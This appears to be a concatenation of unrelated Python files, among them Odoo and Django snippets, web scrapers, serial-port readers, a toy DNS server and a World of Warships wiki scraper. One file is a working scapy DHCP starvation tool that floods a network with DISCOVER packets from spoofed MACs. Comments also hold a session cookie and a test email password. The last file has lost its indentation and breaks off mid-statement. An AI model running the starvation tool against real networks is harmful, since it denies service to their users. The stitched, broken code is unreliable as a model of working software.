# -*- coding: utf-8 -*-
{
'name': 'variacion tipo de cambio',
'version': '1.0.0',
'category': '',
'description': """
In some organisations people want an extra state between draft - send and confirmed.
This module adds state validated to sale order and puts also a menu extra in the sales
""",
'author': 'Econube | Pablo Cabezas Jose Pinto',
'website': 'http://www.econube.cl',
'depends': ['account_voucher'],
'init': [],
'data': ['wizard/wizard_cambio.xml','form_account.xml','res_config.xml'],
'demo': [],
'test': [],
'installable': True,
'active': False,
}
|
from django.conf import settings as django_settings
from django.utils.translation import ugettext_lazy as _
from feincms.admin.tree_editor import *
class TreeEditor(TreeEditor):
    """FeinCMS tree editor with extra per-row action icons.

    Note: deliberately shadows the TreeEditor name pulled in by the
    wildcard import from feincms.admin.tree_editor.
    """
    def _actions_column(self, instance):
        # Start from the icons the base tree editor already renders.
        actions = super(TreeEditor, self)._actions_column(instance)
        static_url = django_settings.STATIC_URL
        opts = instance._meta
        # Models that declare a tree parent attribute get an "Add child"
        # icon whose add form is pre-filled with this node as parent.
        if hasattr(opts, 'parent_attr'):
            actions.insert(0, u'<a href="add/?%s=%s" title="%s"><img src="%simg/admin/icon_addlink.gif" alt="%s"></a>' % (
                opts.parent_attr, instance.pk, _('Add child'), static_url, _('Add child')))
        # Every row gets a "View on site" link as the first icon.
        actions.insert(0, u'<a href="%s" title="%s"><img src="%simg/admin/selector-search.gif" alt="%s" /></a>' % (
            instance.get_absolute_url(), _('View on site'), static_url, _('View on site')))
        return actions
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-08-18 10:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an integer `port` field (default 3300) to the `app` and
    `apphost` models; the escaped verbose_name decodes to 应用端口号
    ("application port number")."""
    dependencies = [
        ('nova', '0010_apphost_name'),
    ]
    operations = [
        migrations.AddField(
            model_name='app',
            name='port',
            field=models.IntegerField(default=3300, verbose_name='\u5e94\u7528\u7aef\u53e3\u53f7'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='apphost',
            name='port',
            field=models.IntegerField(default=3300, verbose_name='\u5e94\u7528\u7aef\u53e3\u53f7'),
            preserve_default=False,
        ),
    ]
|
import requests
# Fetch an autohome.com.cn forum thread with a desktop-Chrome User-Agent
# (the other headers below are kept commented out for reference).
ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) ' \
     'AppleWebKit/537.36 (KHTML, like Gecko) ' \
     'Chrome/75.0.3770.142 Safari/537.36'
headers = {
    'User-Agent': ua
    #'Accept': text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    #'Accept-Encoding': gzip, deflate, br
    #'Accept-Language': zh-CN,zh;q=0.9,en;q=0.8
    #'Cache-Control': max-age=0
    #'Connection': 'keep-alive'
    #'Cookie': fvlid=15673392426551GLwzfGdFQ; sessionid=77FF0F2E-D9B8-4C3D-B6D6-2FC036E040E8%7C%7C2019-09-01+20%3A00%3A44.661%7C%7Cwww.baidu.com; autoid=a2a43099f0b250aa04ca9b5ccd21debe; area=610113; ahpau=1; __ah_uuid_ng=c_77FF0F2E-D9B8-4C3D-B6D6-2FC036E040E8; sessionuid=77FF0F2E-D9B8-4C3D-B6D6-2FC036E040E8%7C%7C2019-09-01+20%3A00%3A44.661%7C%7Cwww.baidu.com; sessionip=111.20.192.214; sessionvid=551BC7D1-7B58-4C4E-B0D0-BFDF2F2FD210; pvidchain=102410,102410; ahpvno=17; ref=www.baidu.com%7C0%7C0%7C0%7C2019-09-02+14%3A08%3A57.853%7C2019-09-01+20%3A00%3A44.661
    #'Host'=club.autohome.com.cn
    #'Upgrade':''-Insecure-Requests: 1
}
# Download the thread HTML as text.
r=requests.get('https://club.autohome.com.cn/bbs/thread/0682da758120fbb8/82601920-1.html',headers=headers).text
print(r) |
from socket import *
import sys
# Simple UDP server that stores one DNS-like record (TYPE/NAME/VALUE/TTL
# lines) in Data.txt and answers later TYPE/NAME queries from that file.
server_port = 53533
# Create a socket (UDP)
server_socket = socket(AF_INET, SOCK_DGRAM)
# Bind to port
server_socket.bind(('', server_port))
DataDict = {}
# Now listen
print('The server is ready to receive message...')
while True:
    # Receive message
    message, client_address = server_socket.recvfrom(2048)
    data = message.decode()
    # Fix: `if 'VALUE' and 'TTL' in data:` only tested 'TTL' in data
    # ('VALUE' is a truthy constant) — test both substrings explicitly.
    if 'VALUE' in data and 'TTL' in data:
        # Registration request: parse the four key=value lines.
        Type, Name, Value, TTL = data.split('\n')
        TypeDNS = Type.strip().split('=')[-1]
        TTLValue = TTL.strip().split('=')[-1]
        Hostname = Name.strip().split('=')[-1]
        IP = Value.strip().split('=')[-1]
        DataDict["Type"] = TypeDNS
        DataDict["Hostname"] = Hostname
        DataDict["IP"] = IP
        DataDict["TTL"] = TTLValue
        # Persist the raw record; `with` closes the file even on error.
        with open('Data.txt', 'w') as file:
            file.write(data)
        modified_message = '201'
        # Send it back
        server_socket.sendto(modified_message.encode(), client_address)
    else:
        # Query request: TYPE and NAME lines only.
        Type, Name = data.split('\n')
        Hostname = Name.strip().split('=')[-1]
        TypeDNS = Type.strip().split('=')[-1]
        with open('Data.txt', 'r') as file:
            FileData = file.read()
        TypeFile, NameFile, ValueFile, TTLFile = FileData.split('\n')
        # Answer only A-record queries whose hostname matches the record.
        if 'A' in TypeFile and Hostname in NameFile:
            modified_message = str(FileData)
            server_socket.sendto(modified_message.encode(), client_address)
|
from scapy.all import *
import sys, getopt
import netifaces
def main(argv):
    # DHCP starvation tool (Python 2): floods the chosen interface with
    # 255 DHCP DISCOVER packets, each from a random spoofed MAC.
    ifaceList = netifaces.interfaces()
    try:
        opts, args = getopt.getopt(argv,"hi:",["iface="])
    except getopt.GetoptError:
        print "StarvationDHCP.py -i <interface>"
        print "Interfaces availables: " + str(ifaceList)
        sys.exit(2)
    for opt, arg in opts:
        if opt == "-h":
            print " --> StarvationDHCP.py [-i | --iface] <interface> // default 'eth0'"
            print " --> Interfaces availables: " + str(ifaceList)
            sys.exit()
        elif opt in ("-i", "--iface"):
            # Only accept interfaces that netifaces reports as present.
            if str(argv[1]) in ifaceList:
                conf.iface = argv[1]
            else:
                print "Invalid interface. Interfaces availables: " + str(ifaceList)
                exit()
        else:
            conf.iface = 'eth0' #Interface default eth0
    # Replies will come from the DHCP server's IP, not ours.
    conf.checkIPaddr = False
    print "Interface: " + conf.iface
    print """
            ***                                              ***
            ***   Push Ctrl+C to stop after several seconds  ***
            ***                                              ***
        """
    for x in range(255): # send 255 packet with fakes macs
        src_mac = str(RandMAC())
        # Broadcast Ethernet frame carrying a DHCP DISCOVER from the
        # spoofed MAC, asking the server to lease yet another address.
        ether = Ether(dst='ff:ff:ff:ff:ff:ff',src=src_mac)
        ip = IP(src="0.0.0.0", dst="255.255.255.255")
        udp = UDP(sport=68, dport=67)
        bootp = BOOTP(chaddr=src_mac, ciaddr='0.0.0.0', flags=1)
        dhcp = DHCP(options=[("message-type", "discover"), "end"])
        packet = ether/ip/udp/bootp/dhcp # create packet
        packet.show() #show info to generated packet
        #sendp(packet,loop=1) # send a packet countless times
        sendp(packet)
if __name__ == "__main__":
    main(sys.argv[1:])
|
from .eLABJournalObject import *
from .Samples import *
import urllib.parse
class Storage(eLABJournalObject):
    def __init__(self, api, data):
        """
        Internal use only: initialize storage object
        """
        # Fix: the old guard chained conditions with the bitwise `&`
        # operator, which does not short-circuit — passing data=None
        # raised TypeError on `"name" in data` instead of the intended
        # Exception below.
        if data is not None and type(data) == dict and "name" in data:
            super().__init__(api, data, "storageID", str(data["name"]))
        else:
            raise Exception("no (valid) Storage data")
    def visualize(self):
        """
        Create visualization.
        """
        g = super().visualize()
        storage_type = self.storage_type()
        # Attach a sub-cluster describing the storage type, if any.
        if storage_type:
            storage_type_id = str(storage_type.id())
            storage_type_name = str(storage_type.name())
            storage_type_type = str(storage_type.type())
            with g.subgraph(name="cluster_type") as g_type:
                g_type.attr(tooltip="type of storage", label="storageTypeID "+storage_type_id, style="filled", color="black", fillcolor="#EEEEEE")
                g_type.node("storage_type_name",storage_type_name, {"tooltip": "type of storage", "style": "filled", "fillcolor": "white", "shape": "rect"})
                g_type.node("storage_type_type",storage_type_type, {"tooltip": "type of storage", "style": "filled", "fillcolor": "white", "shape": "rect"})
            g.edge("storage_type_type", "class_name", None, {"constraint": "false"})
        return(g)
    def barcode(self):
        """
        Get the barcode of the storage (layer), or None if absent.
        """
        if "barcode" in self.data():
            barcode = self.data()["barcode"]
            return(barcode)
        return None
    def storage_layer(self):
        """
        Get the storage layer, or None if this storage has none.
        """
        if "storageLayerID" in self.data():
            storageLayerID = self.data()["storageLayerID"]
            if storageLayerID>0:
                return(self._eLABJournalObject__api.storage_layer(storageLayerID))
        return None
    def storage_type(self):
        """
        Get the storage type, or None if it cannot be resolved.
        """
        if "storageType" in self.data():
            storageType = self.data()["storageType"]
            # Fix: `isinstance(...) & (...in storageType.keys())` evaluated
            # both operands, so a non-dict value crashed on .keys();
            # `and` short-circuits.
            if isinstance(storageType, dict) and "storageTypeID" in storageType:
                storageTypeID = storageType["storageTypeID"]
                return(self._eLABJournalObject__api.storage_type(storageTypeID))
        return None
    def statistics(self):
        """
        Get statistics for storage.
        """
        request = {}
        rp = self._eLABJournalObject__api._request("/api/v1/storage/"+urllib.parse.quote(str(self.id()))+"/statistics", "get", request)
        #check and get
        # Fix: use short-circuiting `and` instead of bitwise `&`.
        if rp is not None and type(rp) == dict:
            return(rp)
        else:
            return(None)
    def samples(self, *args, **kwargs):
        """
        Get object to access samples for storage.
        Parameters (object)
        ----------------------
        class: parser
            Pass the result of the first() method on this object instead
        class: sample_type
            Filter by sampleTypeID of this object
        Parameters (key/value)
        ----------------------
        expand : str, optional
            Expand an ID field to an object
            separate values with comma for multiple expands
            location, quantity, meta, experiments
        sort : str, optional
            Sort by a specific field
        checkedOut : str, optional
            Filter for checked out samples
        minimumQuantityAmount : str, optional
            Filter for samples that have a minimum quantity amount set
        name : str, optional
            Filter by sample name
        sampleTypeID : str, optional
            Filter by sampleTypeID
        barcodes : str, optional
            Filter by barcodes (comma-separated)
        search : str, optional
            Search term to use for filtering samples.
        quantityID : str, optional
            Filter by quantityID
        """
        request = {}
        kwargs_special = ["expand", "sort"]
        kwargs_keys = ["checkedOut", "name", "sampleTypeID", "barcodes",
                       "search", "quantityID"]
        if args is not None:
            for arg in args:
                check_arg = arg
                # Pager objects stand in for their first entry.
                if isinstance(check_arg,eLABJournalPager):
                    check_arg = arg.first(True)
                if isinstance(check_arg,SampleType):
                    request["sampleTypeID"] = check_arg.id()
                else:
                    raise Exception("unsupported object '"+str(type(check_arg))+"'")
        if kwargs is not None:
            for key, value in kwargs.items():
                # "special" keys are passed to the API with a $ prefix.
                if key in kwargs_special:
                    request["$"+key] = value
                elif key in kwargs_keys:
                    request[key] = value
                else:
                    raise Exception("unsupported key '"+key+"'")
        return(Samples(self._eLABJournalObject__api, "Samples", "/api/v1/storage/"+urllib.parse.quote(str(self.id()))+"/samples", request, "sampleID", 5, self._eLABJournalObject__api.sample))
|
"""
test fixtures package
"""
|
import time
import imaplib
import serial
##ORG_EMAIL = "@gmail.com"
##FROM_EMAIL = "test50201" + ORG_EMAIL
##FROM_PWD = "TestTest123!"
##SMTP_SERVER = "imap.gmail.com"
##SMTP_PORT = 993
def getUsername():
    # Prompt the user for the Gmail account name (without the domain).
    return input("Username: ")
def getPassword():
    # Prompt for the password. NOTE(review): input() echoes the password;
    # consider getpass.getpass() instead.
    return input("Password: ")
def readMail():
    """Poll the IMAP inbox every 3 seconds and call sendSignal() whenever
    a new message arrives.

    Uses the module-level SMTP_SERVER / FROM_EMAIL / FROM_PWD credentials.
    """
    mail = imaplib.IMAP4_SSL(SMTP_SERVER)
    mail.login(FROM_EMAIL, FROM_PWD)
    latest_email_id = b''
    while True:
        mail.select('inbox')
        typ, data = mail.search(None, 'ALL')
        mail_ids = data[0]
        id_list = mail_ids.split()
        # Fix: the old code compared mail_ids[-1] — the last *byte* of the
        # ID string (an int in Python 3) — so e.g. going from message ID
        # 12 to 22 was not detected as new mail, and an empty mailbox
        # raised IndexError.  Track the last full message ID instead.
        if id_list and id_list[-1] == latest_email_id:
            print("No New Email")
            time.sleep(3)
        else:
            print("A new email has arrived!")
            sendSignal()
            if id_list:
                latest_email_id = id_list[-1]
            time.sleep(3)
def sendSignal():
    # Notify the Arduino over the serial connection that mail arrived.
    arduino.write(b'1')
ORG_EMAIL = "@gmail.com"  # account domain appended to the username
USERNAME = getUsername()
FROM_EMAIL = USERNAME + ORG_EMAIL
PASSWORD = getPassword()
FROM_PWD = PASSWORD
SMTP_SERVER = "imap.gmail.com"  # Gmail IMAP endpoint (despite the name)
SMTP_PORT = 993
# Serial link to the Arduino that signals new mail.
arduino = serial.Serial('COM3', 9600)
readMail()
|
# My solution for https://www.hackerrank.com/challenges/predicting-house-prices/problem
# this program gets a score of (9.82 / 10)
import numpy as np
def parseInput():
    """Read the training and test sets from stdin.

    Input format: "features number", then `number` rows whose last column
    is the price, then the test-row count and the test rows.
    Returns (trainData, trainLabels, testData).
    """
    features, number = map(int, input().split())
    # Each training row ends with its label (the price).
    trainData = [list(map(float, input().split())) for _ in range(number)]
    trainLabels = [row[-1] for row in trainData]
    for row in trainData:
        row.pop()  # strip the label column from the features
    testNumber = int(input())
    testData = [list(map(float, input().split())) for _ in range(testNumber)]
    return (trainData, trainLabels, testData)
def changeToMatrix(trainData, trainLabels, testData):
    """Solve the normal equation theta = (X^T X)^+ X^T y for linear
    regression and return the parameter vector.

    testData is accepted for signature compatibility but not used here.
    """
    X = np.array(trainData)
    y = np.array(trainLabels)
    Xt = np.transpose(X)
    # Pseudo-inverse handles singular X^T X gracefully.
    gramPinv = np.linalg.pinv(np.matmul(Xt, X))
    thetaMatrix = np.matmul(np.matmul(gramPinv, Xt), y)
    return thetaMatrix
# Fit the linear model on stdin data, then print the predicted price
# (theta . x) for every test row.
trainData, trainLabels, testData = parseInput()
thetaMatrix = changeToMatrix(trainData, trainLabels, testData)
for j in testData:
    print (np.matmul(np.transpose(thetaMatrix), np.array(j)))
|
#!/usr/bin/python
#\file loadcell1.py
#\brief Serial communication test with Arduino where loadcells are installed.
#\author Akihiko Yamaguchi, info@akihikoy.net
#\version 0.1
#\date Apr.13, 2021
import sys
import serial
import time
if __name__=='__main__':
    # Read load-cell lines like "Reading: 12.3g" from the Arduino serial
    # port and report the effective frames-per-second every 40 samples.
    # (Python 2 script — print statements.)
    dev= sys.argv[1] if len(sys.argv)>1 else '/dev/ttyACM0'
    baudrate= int(sys.argv[2]) if len(sys.argv)>2 else 2e6
    ser= serial.Serial(dev,baudrate,serial.SEVENBITS,serial.PARITY_NONE)
    count= 0
    t_prev= time.time()
    try:
        while True:
            raw= ser.readline()
            try:
                # Strip the "Reading:" prefix and "g" unit to get a float.
                value= float(raw.replace('Reading:','').replace('g\r\n','').strip())
            except ValueError:
                print 'No regular value: {raw} ({l})'.format(raw=repr(raw), l=len(raw))
                continue
            print '{raw} ({l}), {value}'.format(raw=repr(raw), l=len(raw), value=value)
            #if len(raw)!=17: continue
            #value= float(raw[3:12])
            count+= 1
            # Report throughput once every 40 good samples.
            if count%40==0:
                print 'FPS:',40./(time.time()-t_prev)
                t_prev= time.time()
            #ser.reset_input_buffer()
            ##ser.flushInput()
            #raw= ser.readline()
            #time.sleep(0.01)
    finally:
        # Always release the serial port, even on Ctrl+C.
        ser.close()
|
if __name__ == "__main__":
    # Demonstrate list-membership tests with `in` and `not in`.
    fruits = ['apple', 'banana', 'peach', 'cherry', 'tomato']
    if 'banana' in fruits:
        print("You are right bananas are great!")
    if 'cherry' not in fruits:
        print("What is wrong with cherry's?")
    if 'tomato' in fruits:
        print("Tomatos are juicy!")
    if 'peach' in fruits and 'apple' in fruits:
        print("Peaches and apples are great!")
    if 'bread' in fruits:
        print("Bread is not a fruit!")
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
# Build a grouped box plot comparing two SLAM algorithms' error at five
# travelled distances, with a shared legend above the axes.
df = pd.DataFrame({'DataSet':['10', '10','20','20', '30', '30', '40', '40', '50', '50'],\
                   'Proposed':[0.1, 4, 0, 4.8, 0, 6, 0, 7.3, 0, 8],
                   'VI-ORB SLAM':[0, 3, 0, 5.1, 0, 6.2, 0, 7.6, 0, 8.1]})
df = df[['DataSet','Proposed','VI-ORB SLAM']]
print(df)
# Melt to long form so seaborn can hue by algorithm.
dd=pd.melt(df,id_vars=['DataSet'],value_vars=['Proposed','VI-ORB SLAM'],var_name='Algorithm')
fig = sns.boxplot(x='DataSet',y='value',data=dd,hue='Algorithm', width=0.4)
fig.legend(loc='upper center', bbox_to_anchor=(0.5, 1.18),
           ncol=2, fancybox=True, shadow=True)
fig.set(xlabel='Distance Travelled (m)', ylabel='Error (m)')
figure_title = "Laptop"
# Title placed in axes coordinates so it sits above the legend.
plt.text(0.5, 1.22, figure_title,
         horizontalalignment='center',
         fontsize=18,
         transform = fig.transAxes)
#plt.grid(True)
plt.show()
|
#! python3
import webbrowser
import sys
import bs4
import requests
import openpyxl
import os
import xlsxwriter
import re
rootSite = 'http://wiki.wargaming.net/en/World_of_Warships'
#shipclasses = ['DD', 'CA', 'BB', 'CV']
shipclasses = ['DD', 'CA', 'BB']
# shipclasses = ['CA', 'BB']
# skiplist = ['St. Louis']
for shipclass in shipclasses:
if shipclass == 'DD':
shipsite = 'http://wiki.wargaming.net/en/Ship:Destroyers'
elif shipclass == 'CA':
shipsite = 'http://wiki.wargaming.net/en/Ship:Cruisers'
elif shipclass == 'BB':
shipsite = 'http://wiki.wargaming.net/en/Ship:Battleships'
elif shipclass == 'CV':
shipsite = 'http://wiki.wargaming.net/en/Ship:Aircraft_Carriers'
##### creating the resultfile
shipfilename = shipclass+'results.xlsx'
relpath = os.path.abspath(os.path.dirname(__file__))
resultfile = relpath+"\\"+shipfilename
if os.path.exists(resultfile):
os.remove(resultfile)
print('deleted '+resultfile)
print('creating file with xlswriter')
xlswritership = xlsxwriter.Workbook(shipfilename)
xlswritership.close()
shipsheet = openpyxl.load_workbook(shipfilename)
firstsheet = shipsheet['Sheet1']
firstsheet.title = 'BattleLevel 1'
shipsheet.create_sheet('BattleLevel 2')
shipsheet.create_sheet('BattleLevel 3')
shipsheet.create_sheet('BattleLevel 4')
shipsheet.create_sheet('BattleLevel 5')
shipsheet.create_sheet('BattleLevel 6')
shipsheet.create_sheet('BattleLevel 7')
shipsheet.create_sheet('BattleLevel 8')
shipsheet.create_sheet('BattleLevel 9')
shipsheet.create_sheet('BattleLevel 10')
#resultfile created
##### setting the top row of each sheet
toprow = [
'shipName',
'shipClass',
'shipCountry',
'shipTier',
'shipCurrency',
'shipCost',
'shipHitPoints',
'shipResearch',
'shipMainGun',
'shipMainGunCount',
'shipMainGunROF',
'shipMainGunReload',
'shipMainGunRotate',
'shipMainGun180',
'shipMainGunRange',
'shipMainGunDispersion',
'shipMainGunHEShell',
'shipMainGunHEDam',
'shipMainGunHEFire',
'shipMainGunHEVel',
'shipMainGunHEWeight',
'shipMainGunAPShell',
'shipMainGunAPDam',
'shipMainGunAPVel',
'shipMainGunAPWeight'
]
for sheet in shipsheet.worksheets:
# print(toprow)
for n in range(1,len(toprow)+1):
sheet.cell(row=1,column=n).value = toprow[n-1]
#testing the root site
# rootres = requests.get(rootsite)
# rootres.raise_for_status()
# rootSoup = bs4.BeautifulSoup(rootres.text)
##TODO - turn this into something that isn't restricted to DD
#get destroyer site
pagereq = requests.get(shipsite)
pagereq.raise_for_status()
pagesoup = bs4.BeautifulSoup(pagereq.text, "html.parser")
#print japanese DD names
nationDivs = pagesoup.find_all("div",class_="wot-frame-1")
for nation in nationDivs:
print('====================')
print(nation.find("h2").text)
print('====================')
nationShips = nation.find_all("div",class_="tleft")
for thisShip in nationShips:
fulllink = 'http://wiki.wargaming.net'+(thisShip.find_all("a"))[1].attrs['href']
getshipname = (thisShip.find_all("a"))[1].text
print('regex time')
if (re.search("St.*Louis",getshipname)) or (re.search("Nueve.de.Julio",getshipname)):
print('found it')
else:
shiparray = {}
shiparray['shipName'] = getshipname
print('----- ' + shiparray['shipName'])
# print(fulllink)
thisShipPage = requests.get(fulllink)
thisShipPage.raise_for_status()
thisShipSoup = bs4.BeautifulSoup(thisShipPage.text, "html.parser")
#gets class, country, tier
perfdiv = thisShipSoup.find('div',class_='b-performance_position')
shiparray['shipClass'] = perfdiv.text.split(' | ')[0]
shiparray['shipCountry'] = perfdiv.text.split(' | ')[1]
shiparray['shipTier'] = perfdiv.text.split(' | ')[2]
# print(shiparray)
#gets general, armament, toobs, maneuverability, concealment
shipstats = thisShipSoup.find('div',class_='b-performance_border').find_all('div',class_='gw-popup-card b-tech-nav_item__opened')
for statgroup in shipstats:
groupName = statgroup.find('div',class_='b-performance_title gw-popup-card_head js-tech-nav_head').text
# print('--')
# print(groupName)
# print('--')
stats = statgroup.find('div',class_='gw-popup-card_content').find_all('tr')
###GENERAL STAT GROUP
if groupName == 'General':
# shipCurrency = ''
# shipCost = ''
# shipHitPoints = ''
# shipResearch = ''
for stat in stats:
# print('--------------')
##TODO - strip whitespace from variables
if stat.find('span',class_='t-performance_left').text == 'Purchase price':
shiparray['shipCurrency'] = stat.find('img')['alt']
shiparray['shipCost'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Hit Points':
shiparray['shipHitPoints'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Research price':
shiparray['shipResearch'] = stat.find('span',class_='t-performance_right').text
# if shipCost != 'promo':
# print('Currency: '+shipCurrency)
# print('Cost: '+shipCost)
# print('HP: '+shipHitPoints)
# if shipResearch != '':
# print('ResearchXP: '+shipResearch)
#print(stats)
###MAIN BATTERY
elif groupName == 'Main Battery':
# shipMainGun = ''
# shipMainGunCount = ''
# shipMainGunROF = ''
# shipMainGunReload = ''
# shipMainGunRotate = ''
# shipMainGun180 = ''
# shipMainGunRange = ''
# shipMainGunDispersion = ''
# shipMainGunHEShell = ''
# shipMainGunHEDam = ''
# shipMainGunHEFire = ''
# shipMainGunHEVel = ''
# shipMainGunHEWeight = ''
# shipMainGunAPShell = ''
# shipMainGunAPDam = ''
# shipMainGunAPVel = ''
# shipMainGunAPWeight = ''
shiparray['shipMainGun'] = stats[0].find('span',class_='t-performance_left').text
shiparray['shipMainGunCount'] = stats[0].find('span',class_='t-performance_right').text
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Rate of Fire':
shiparray['shipMainGunROF'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Reload Time':
shiparray['shipMainGunReload'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Rotation Speed':
shiparray['shipMainGunRotate'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == '180 Degree Turn Time':
shiparray['shipMainGun180'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Firing Range':
shiparray['shipMainGunRange'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum Dispersion':
shiparray['shipMainGunDispersion'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell':
shiparray['shipMainGunHEShell'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum HE Shell Damage':
shiparray['shipMainGunHEDam'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Chance of Fire on Target Caused by HE Shell':
shiparray['shipMainGunHEFire'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial HE Shell Velocity':
shiparray['shipMainGunHEVel'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell Weight':
shiparray['shipMainGunHEWeight'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell':
shiparray['shipMainGunAPShell'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum AP Shell Damage':
shiparray['shipMainGunAPDam'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial AP Shell Velocity':
shiparray['shipMainGunAPVel'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell Weight':
shiparray['shipMainGunAPWeight'] = stat.find('span',class_='t-performance_right').text
# print(shipMainGun)
# print(shipMainGunCount)
# print(shipMainGunROF)
# print(shipMainGunReload)
# print(shipMainGunRotate)
# print(shipMainGun180)
# print(shipMainGunRange)
# print(shipMainGunDispersion)
# print(shipMainGunHEShell)
# print(shipMainGunHEDam)
# print(shipMainGunHEFire)
# print(shipMainGunHEVel)
# print(shipMainGunHEWeight)
# print(shipMainGunAPShell)
# print(shipMainGunAPDam)
# print(shipMainGunAPVel)
# print(shipMainGunAPWeight)
###Secondary Batteries
elif groupName == 'Secondary Armament #1':
shipSec1Gun = ''
shipSec1GunCount = ''
shipSec1GunROF = ''
shipSec1GunReload = ''
shipSec1GunRotate = ''
shipSec1Gun180 = ''
shipSec1GunRange = ''
shipSec1GunDispersion = ''
shipSec1GunHEShell = ''
shipSec1GunHEDam = ''
shipSec1GunHEFire = ''
shipSec1GunHEVel = ''
shipSec1GunHEWeight = ''
shipSec1GunAPShell = ''
shipSec1GunAPDam = ''
shipSec1GunAPVel = ''
shipSec1GunAPWeight = ''
shipSec1Gun = stats[0].find('span',class_='t-performance_left').text
shipSec1GunCount = stats[0].find('span',class_='t-performance_right').text
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Rate of Fire':
shipSec1GunROF = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Reload Time':
shipSec1GunReload = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Rotation Speed':
shipSec1GunRotate = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == '180 Degree Turn Time':
shipSec1Gun180 = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Firing Range':
shipSec1GunRange = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum Dispersion':
shipSec1GunDispersion = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell':
shipSec1GunHEShell = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum HE Shell Damage':
shipSec1GunHEDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Chance of Fire on Target Caused by HE Shell':
shipSec1GunHEFire = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial HE Shell Velocity':
shipSec1GunHEVel = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell Weight':
shipSec1GunHEWeight = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell':
shipSec1GunAPShell = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum AP Shell Damage':
shipSec1GunAPDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial AP Shell Velocity':
shipSec1GunAPVel = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell Weight':
shipSec1GunAPWeight = stat.find('span',class_='t-performance_right').text
elif groupName == 'Secondary Armament #2':
shipSec2Gun = ''
shipSec2GunCount = ''
shipSec2GunROF = ''
shipSec2GunReload = ''
shipSec2GunRotate = ''
shipSec2Gun180 = ''
shipSec2GunRange = ''
shipSec2GunDispersion = ''
shipSec2GunHEShell = ''
shipSec2GunHEDam = ''
shipSec2GunHEFire = ''
shipSec2GunHEVel = ''
shipSec2GunHEWeight = ''
shipSec2GunAPShell = ''
shipSec2GunAPDam = ''
shipSec2GunAPVel = ''
shipSec2GunAPWeight = ''
shipSec2Gun = stats[0].find('span',class_='t-performance_left').text
shipSec2GunCount = stats[0].find('span',class_='t-performance_right').text
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Rate of Fire':
shipSec2GunROF = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Reload Time':
shipSec2GunReload = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Rotation Speed':
shipSec2GunRotate = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == '180 Degree Turn Time':
shipSec2Gun180 = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Firing Range':
shipSec2GunRange = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum Dispersion':
shipSec2GunDispersion = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell':
shipSec2GunHEShell = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum HE Shell Damage':
shipSec2GunHEDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Chance of Fire on Target Caused by HE Shell':
shipSec2GunHEFire = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial HE Shell Velocity':
shipSec2GunHEVel = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell Weight':
shipSec2GunHEWeight = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell':
